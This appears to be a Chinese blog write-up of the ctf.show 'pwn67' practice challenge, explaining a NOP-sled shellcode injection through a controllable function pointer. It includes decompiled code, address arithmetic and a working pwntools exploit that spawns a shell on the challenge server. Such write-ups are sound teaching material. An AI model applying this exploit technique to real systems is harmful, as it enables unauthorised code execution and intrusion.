<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"style":"mac"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="pwn67ctf.show pwn67">
<meta property="og:type" content="article">
<meta property="og:title" content="ctfshow pwn入门 pwn67">
<meta property="og:url" content="http://example.com/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/index.html">
<meta property="og:site_name" content="yangyunhui">
<meta property="og:description" content="pwn67ctf.show pwn67">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/1.png">
<meta property="og:image" content="http://example.com/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/2.png">
<meta property="og:image" content="http://example.com/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/3.png">
<meta property="article:published_time" content="2025-11-16T07:47:31.000Z">
<meta property="article:modified_time" content="2025-11-16T07:57:39.373Z">
<meta property="article:author" content="yangyunhui">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="PWN">
<meta property="article:tag" content="网络安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/1.png">

<link rel="canonical" href="http://example.com/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ctfshow pwn入门 pwn67 | yangyunhui</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">yangyunhui</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">功不唐捐，玉汝于成</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/tx.jpg">
      <meta itemprop="name" content="yangyunhui">
      <meta itemprop="description" content="前踪杳杳，后途昭昭">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="yangyunhui">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ctfshow pwn入门 pwn67
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2025-11-16 15:47:31 / 修改时间：15:57:39" itemprop="dateCreated datePublished" datetime="2025-11-16T15:47:31+08:00">2025-11-16</time>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>4.2k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>8 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="pwn67"><a href="#pwn67" class="headerlink" title="pwn67"></a>pwn67</h2><p><a target="_blank" rel="noopener" href="https://ctf.show/challenges#pwn67-4077">ctf.show pwn67</a> </p>
<span id="more"></span>

<h3 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h3><ul>
<li><a href="#jump1">题目</a></li>
<li><a href="#jump2">预计时间</a></li>
<li><a href="#jump3">题目分析及截图</a></li>
</ul>
<hr>
<h4 id="题目"><a href="#题目" class="headerlink" title="题目"></a><a id = "jump1">题目</a></h4><img src="/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/1.png" class="" title="This is an image">

<h4 id="预计时间"><a href="#预计时间" class="headerlink" title="预计时间"></a><a id="jump2">预计时间</a></h4><p>5h</p>
<h4 id="题目分析及截图"><a href="#题目分析及截图" class="headerlink" title="题目分析及截图"></a><a id="jump3">题目分析及截图</a></h4><p>题目标题是<code>nop sled</code>,我们先来说一下原理是什么</p>
<p><strong>NOP sled</strong> 是通过连续的 <strong>NOP</strong> 指令（通常是 <code>0x90</code>）在内存中构造一个 “滑道”，使得程序能够在没有精确控制跳转地址的情况下，依然能“滑行”到我们注入的 <strong>shellcode</strong>。这是一种应对 <strong>地址随机化</strong>（如 ASLR）和 <strong>精确跳转控制</strong> 不足的攻击技术。</p>
<p>我们首先使用<code>checksec ./pwn</code>看一下它的保护机制</p>
<img src="/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/2.png" class="" title="This is an image">

<p>我们可以看到这是32位程序，开启了canary，但是NX没有开启，代表我们是可以进行shellcode注入的</p>
<p>我们打开ida查看程序的<strong>主函数</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// bad sp value at call has been detected, the output may be wrong!</span></span><br><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> *position; <span class="comment">// eax</span></span><br><span class="line">  <span class="type">void</span> (*v5)(<span class="type">void</span>); <span class="comment">// [esp+0h] [ebp-1010h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> seed[<span class="number">1027</span>]; <span class="comment">// [esp+4h] [ebp-100Ch] BYREF</span></span><br><span class="line"></span><br><span class="line">  seed[<span class="number">1025</span>] = (<span class="type">unsigned</span> <span class="type">int</span>)&amp;argc;</span><br><span class="line">  seed[<span class="number">1024</span>] = __readgsdword(<span class="number">0x14u</span>);</span><br><span class="line">  setbuf(<span class="built_in">stdout</span>, <span class="number">0</span>);</span><br><span class="line">  logo();</span><br><span class="line">  srand((<span class="type">unsigned</span> <span class="type">int</span>)seed);</span><br><span class="line">  Loading();</span><br><span class="line">  acquire_satellites();</span><br><span class="line">  position = query_position();</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;We need to load the ctfshow_flag.\nThe current location: %p\n&quot;</span>, position);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;What will you do?\n&gt; &quot;</span>);</span><br><span class="line">  fgets((<span class="type">char</span> *)seed, <span class="number">4096</span>, <span class="built_in">stdin</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Where do you start?\n&gt; &quot;</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%p&quot;</span>, &amp;v5);</span><br><span class="line">  v5();</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>query_position函数</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *<span class="title function_">query_position</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> v1; <span class="comment">// [esp+3h] [ebp-15h] BYREF</span></span><br><span class="line">  <span class="type">int</span> v2; <span class="comment">// [esp+4h] [ebp-14h]</span></span><br><span class="line">  <span class="type">char</span> *v3; <span class="comment">// [esp+8h] [ebp-10h]</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> v4; <span class="comment">// [esp+Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readgsdword(<span class="number">0x14u</span>);</span><br><span class="line">  v2 = rand() % <span class="number">1337</span> - <span class="number">668</span>;</span><br><span class="line">  v3 = &amp;v1 + v2;</span><br><span class="line">  <span class="keyword">return</span> &amp;v1 + v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>代码的逻辑：</strong></p>
<ol>
<li>程序会先输出一些字符，还有一个<strong>地址</strong>，根据query_position函数来看这个地址<code>position = &amp;v1+v2</code></li>
<li>程序让我们输入一串字符串（大小是4096）给到<code>seed变量</code></li>
<li>输入一串地址赋值给v5</li>
</ol>
<h5 id="大致思路："><a href="#大致思路：" class="headerlink" title="大致思路："></a><strong>大致思路：</strong></h5><p>在<code>checksec ./pwn</code>时，我们发现了有canary保护机制，如果平常的话，我们可能通过爆破canary来解这道题，但是本题需要我们去爆破canary吗？？</p>
<p><strong>首先</strong>，我们是通过往seed里面去写shellcode，在通过<code>scanf函数</code>输入v5的地址直接跳转到v5(我们的v5可以是shellcode的地址)，根本不需要用到canary，因为canary是用来保护返回地址的，而这道题我们<strong>不是用覆盖返回地址</strong>来写的，自然不用去爆破canary。</p>
<p><strong>再说的详细一点就是</strong></p>
<blockquote>
<p><strong>因为程序的漏洞点不是返回地址覆盖，而是可控函数指针 <code>v5</code>。</strong></p>
</blockquote>
<p>我们通过 <code>fgets</code> 往 seed[] 里写入了 shellcode，然后使用：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">scanf</span>(<span class="string">&quot;%p&quot;</span>, &amp;v5);</span><br><span class="line">v5();</span><br></pre></td></tr></table></figure>

<p>直接控制程序跳转到 seed[]。<br> 整个过程不经过函数返回，也不会触发栈保护 Canary，因此不需要泄露或爆破 Canary</p>
<p>现在你应该知道为什么不需要爆破canary了</p>
<p><strong>现在我们要计算输入v5的地址是多少</strong></p>
<p>我画了一个栈的图更方便我们去理解（上面是高地址，下面是低地址）</p>
<img src="/2025/11/16/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn67/3.png" class="" title="style&#x3D;transform: scale(0.15); This is an image">

<ol>
<li><p>**v1距seed的距离：**v1的位置是<code>ebp-15h</code>那么它与query_position的ebp的距离是<code>15h</code></p>
</li>
<li><p><strong>输入v5的值：</strong></p>
<p>因为：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">v2 = rand() % <span class="number">1337</span> - <span class="number">668</span>;</span><br><span class="line">v3 = &amp;v1 + v2;</span><br><span class="line"><span class="keyword">return</span> &amp;v1 + v2;</span><br></pre></td></tr></table></figure>

<p>所以：</p>
<ul>
<li>position &#x3D; &amp;v1 + v2 &#x3D; &amp;v1 + rand() % 1337 - 668 （我们假设<code>rand()%1337</code>为random），所以 <strong>position &#x3D; &amp;v1 + random - 668</strong>(random ∈ [0,1336])</li>
<li>由上面可得<strong>v1&#x3D;position-random+668</strong></li>
<li>因为v1距seed的距离是0x2d，所以seed &#x3D; v1 + 0x2d &#x3D; position - random + 668 + 0x2d</li>
<li>因为我们输入的v5一定是在第一个nop之后，在shellcode之前的，我们可以让<code>v5 = position + 668 + 0x2d </code>,我们需要保证nop的长度在shellcode之前，所以我们可以让<strong>nop的长度&#x3D;1336</strong>（或者更长，但是加上shellcode,你不能超过seed的长度）</li>
</ul>
<p>现在就知道我们每一个数值都是多少了</p>
<ol>
<li>nop的长度是1336</li>
<li>v5&#x3D;position+668+0x2d</li>
</ol>
<p>构造exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.arch = <span class="string">&#x27;i386&#x27;</span></span><br><span class="line">p = remote(<span class="string">&#x27;pwn.challenge.ctf.show&#x27;</span>, <span class="number">28164</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;current location:&quot;</span>)</span><br><span class="line">position_addr = <span class="built_in">eval</span>(p.recvuntil(<span class="string">&quot;\n&quot;</span>,drop=<span class="literal">True</span>))</span><br><span class="line"><span class="built_in">print</span>(position_addr)</span><br><span class="line">payload = <span class="string">b&quot;\x90&quot;</span> * <span class="number">1336</span> + asm(shellcraft.sh())</span><br><span class="line">p.recvuntil(<span class="string">&quot;&gt;&quot;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">#输入v5的地址</span></span><br><span class="line">v5_addr = position_addr + <span class="number">668</span> + <span class="number">0x2d</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;&gt;&quot;</span>)</span><br><span class="line">p.sendline(v5_addr)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></li>
</ol>
<ul>
<li><code>\x90</code>就是nop的机器码</li>
</ul>
<h4 id="我遇见的一些问题（可能会把你绕晕）"><a href="#我遇见的一些问题（可能会把你绕晕）" class="headerlink" title="我遇见的一些问题（可能会把你绕晕）"></a>我遇见的一些问题（可能会把你绕晕）</h4><ol>
<li><p>在query_position函数的汇编代码中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">.text:080487D1 ; __unwind &#123;</span><br><span class="line">.text:080487D1                 push    ebp</span><br><span class="line">.text:080487D2                 mov     ebp, esp</span><br><span class="line">.text:080487D4                 push    ebx</span><br><span class="line">.text:080487D5                 sub     esp, 14h</span><br><span class="line">.text:080487D8                 call    __x86_get_pc_thunk_ax</span><br><span class="line">.text:080487DD                 add     eax, (offset _GLOBAL_OFFSET_TABLE_ - $)</span><br><span class="line">.text:080487E2                 mov     ebx, large gs:14h</span><br><span class="line">.text:080487E9                 mov     [ebp+var_C], ebx</span><br><span class="line">.text:080487EC                 xor     ebx, ebx</span><br><span class="line">.text:080487EE                 mov     ebx, eax</span><br><span class="line">.text:080487F0                 call    _rand</span><br><span class="line">.text:080487F5                 mov     ecx, eax</span><br><span class="line">.text:080487F7                 mov     edx, 6208CECBh</span><br><span class="line">.text:080487FC                 mov     eax, ecx</span><br><span class="line">.text:080487FE                 imul    edx</span><br><span class="line">.text:08048800                 sar     edx, 9</span><br><span class="line">.text:08048803                 mov     eax, ecx</span><br><span class="line">.text:08048805                 sar     eax, 1Fh</span><br><span class="line">.text:08048808                 sub     edx, eax</span><br><span class="line">.text:0804880A                 mov     eax, edx</span><br><span class="line">.text:0804880C                 imul    eax, 539h</span><br><span class="line">.text:08048812                 sub     ecx, eax</span><br><span class="line">.text:08048814                 mov     eax, ecx</span><br><span class="line">.text:08048816                 sub     eax, 29Ch</span><br><span class="line">.text:0804881B                 mov     [ebp+var_14], eax</span><br><span class="line">.text:0804881E                 mov     eax, [ebp+var_14]</span><br><span class="line">.text:08048821                 lea     edx, [ebp+var_15]</span><br><span class="line">.text:08048824                 add     eax, edx</span><br><span class="line">.text:08048826                 mov     [ebp+var_10], eax</span><br><span class="line">.text:08048829                 mov     eax, [ebp+var_10]</span><br><span class="line">.text:0804882C                 mov     ebx, [ebp+var_C]</span><br><span class="line">.text:0804882F                 xor     ebx, large gs:14h</span><br><span class="line">.text:08048836                 jz      short loc_804883D</span><br><span class="line">.text:08048838                 call    __stack_chk_fail_local</span><br></pre></td></tr></table></figure></li>
</ol>
<ul>
<li><p>在<code>.text:080487D5                 sub     esp, 14h</code>行，发现query_position函数栈帧给局部变量分配了14h的空间，但是v1的位置为什么是ebp-15h，那不应该分配15h的空间吗？？？</p>
<p>**答：**在<code>sub esp, 14h</code>这一行明确指定了栈帧的局部变量就是14h,这个是不可怀疑的。但是为什么v1在ebp-15h? </p>
<ul>
<li><strong><code>v1</code></strong> 的偏移是 <strong><code>ebp-0x15</code></strong>，是因为 <code>v1</code> 只是一个 1 字节的 <code>char</code> 类型，而栈对齐要求 <code>v2</code>（<code>int</code> 类型）必须按照 4 字节对齐。因此，在 <code>v1</code> 后面插入了 3 字节的填充。</li>
<li><strong><code>v2</code></strong> 紧接着 <code>v1</code> 后面，占用 4 字节，对齐到 4 字节边界。</li>
</ul>
<p><strong>所以，栈上的偏移量是 <code>ebp-0x15</code>，是由于填充字节的存在，符合 4 字节对齐规则。偏移量是相对 ebp 的，并不是要求 offset 最大值 &#x3D; 局部变量区大小</strong></p>
</li>
</ul>
<p>希望可以帮到你，加油！</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/PWN/" rel="tag"># PWN</a>
              <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag"># 网络安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/11/12/pwn64/" rel="prev" title="ctfshow pwn入门 pwn64">
      <i class="fa fa-chevron-left"></i> ctfshow pwn入门 pwn64
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/11/17/ctfshow-pwn%E5%85%A5%E9%97%A8-pwn68/" rel="next" title="ctfshow pwn入门 pwn68">
      ctfshow pwn入门 pwn68 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#pwn67"><span class="nav-number">1.</span> <span class="nav-text">pwn67</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95"><span class="nav-number">1.1.</span> <span class="nav-text">目录</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE"><span class="nav-number">1.1.1.</span> <span class="nav-text">题目</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A2%84%E8%AE%A1%E6%97%B6%E9%97%B4"><span class="nav-number">1.1.2.</span> <span class="nav-text">预计时间</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90%E5%8F%8A%E6%88%AA%E5%9B%BE"><span class="nav-number">1.1.3.</span> <span class="nav-text">题目分析及截图</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%A4%A7%E8%87%B4%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="nav-number">1.1.3.1.</span> <span class="nav-text">大致思路：</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%88%91%E9%81%87%E8%A7%81%E7%9A%84%E4%B8%80%E4%BA%9B%E9%97%AE%E9%A2%98%EF%BC%88%E5%8F%AF%E8%83%BD%E4%BC%9A%E6%8A%8A%E4%BD%A0%E7%BB%95%E6%99%95%EF%BC%89"><span class="nav-number">1.1.4.</span> <span class="nav-text">我遇见的一些问题（可能会把你绕晕）</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="yangyunhui"
      src="/images/tx.jpg">
  <p class="site-author-name" itemprop="name">yangyunhui</p>
  <div class="site-description" itemprop="description">前踪杳杳，后途昭昭</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://blog.csdn.net/yyh3155518319?spm=1000.2115.3001.5343" title="https:&#x2F;&#x2F;blog.csdn.net&#x2F;yyh3155518319?spm&#x3D;1000.2115.3001.5343" rel="noopener" target="_blank">CSDN</a>
        </li>
    </ul>
  </div>

      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">yangyunhui</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">36k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:05</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>
 
  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
